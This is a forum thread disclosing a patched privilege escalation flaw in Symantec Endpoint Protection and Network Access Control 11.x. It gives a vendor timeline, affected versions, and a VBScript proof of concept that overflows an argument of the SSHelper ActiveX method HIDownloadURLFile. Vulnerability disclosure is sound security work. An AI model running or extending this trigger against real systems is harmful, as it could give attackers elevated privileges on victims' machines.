Results 1 to 3 of 3

Thread: Local Privilege Escalation Symantec Endpoint Protection & Network Access Control 11.x Share/Save - My123World.Com!

  1. #1
    Garage Addict 41.w4r10r's Avatar
    Join Date
    Jul 2010
    Location
    Pune
    Posts
    338
    Blog Entries
    3

    Local Privilege Escalation Symantec Endpoint Protection & Network Access Control 11.x

    Hi All,

    After almost more than 8months Symantec finally released patch for the Local Privilege Escalation Bug reported to them.(Disappointed)

    Tested Platform:
    Windows XP SP2 English
    Windows XP SP3 English
    Windows Vista 32Bit
    Windows 7 32Bit

    Time Line:
    30/08/2011 - Sent Details of the vulnerability
    31/08/2011 - Symantec Requested Affected Version Details
    31/08/2011 - Provided Requested Information with POC
    27/09/2011 - Vulnerability Confirmed by Symantec
    22/05/2012 - Advisory Released

    Symantec Advisory:
    Security Advisories Relating to Symantec Products - Symantec Endpoint Protection Multiple Issues - May 22, 2012 | Symantec

    Affected Products:

    Symantec Endpoint Protection
    11.0 RU6(11.0.600x)
    11.0 RU6-MP1(11.0.6100)
    11.0 RU6-MP2(11.0.6200)
    11.0 RU6-MP3(11.0.6300)
    11.0 RU7(11.0.700x)
    11.0 RU7-MP1(11.0.710x)

    Symantec Network Access Control
    11.0 RU6(11.0.600x)
    11.0 RU6-MP1(11.0.6100)
    11.0 RU6-MP2(11.0.6200)
    11.0 RU6-MP3(11.0.6300)
    11.0 RU7(11.0.700x)
    11.0 RU7-MP1(11.0.710x)

    Affected Resource:
    %%System%%\Symantec\Symantec Endpoint Protection\SSHelper.dll

    PoC is enough
    Code:
    <?XML version='1.0' standalone='yes' ?>
    <package><job id='DoneInVBS' debug='false' error='true'>
    <object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target' />
    <script language='vbscript'>
    prototype  = "Function HIDownloadURLFile ( ByVal cookie As Long ,  ByVal url As String ,  ByVal file_path As String ,  ByVal rule_name As String ,  ByVal cancel_message As String ,  ByVal downloading_time As Long ,  ByVal bResume As Boolean ,  ByVal bShowProgressDlg As Boolean ,  ByVal bAllowCancel As Boolean ,  ByVal username As String ,  ByVal password As String ,  ByVal show_error_delay As Long ) As Long"
    memberName = "HIDownloadURLFile"
    progid     = "SSHELPERLib.SSHelper"
    argCount   = 12
    arg1=1
    arg2="defaultV"
    arg3="defaultV"
    arg4="defaultV"
    arg5="defaultV"
    arg6=1
    arg7=True
    arg8=True
    arg9=True
    arg10="defaultV"
    arg11= String(6003, "A")
    arg12=1
    target.HIDownloadURLFile arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8 ,arg9 ,arg10 ,arg11 ,arg12 
    </script></job></package>
    Last edited by 41.w4r10r; 05-23-2012 at 11:36 AM.

  2. #2
    Congrats bro..awesome work..!!!
    The three great essentials to achieve anything worth while are: Hard work, Stick-to-itiveness, and Common sense. - Thomas A. Edison
    __________________________________________________ _____________________

  3. #3
    8 months is Ok! That's pretty much with every other vendor.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •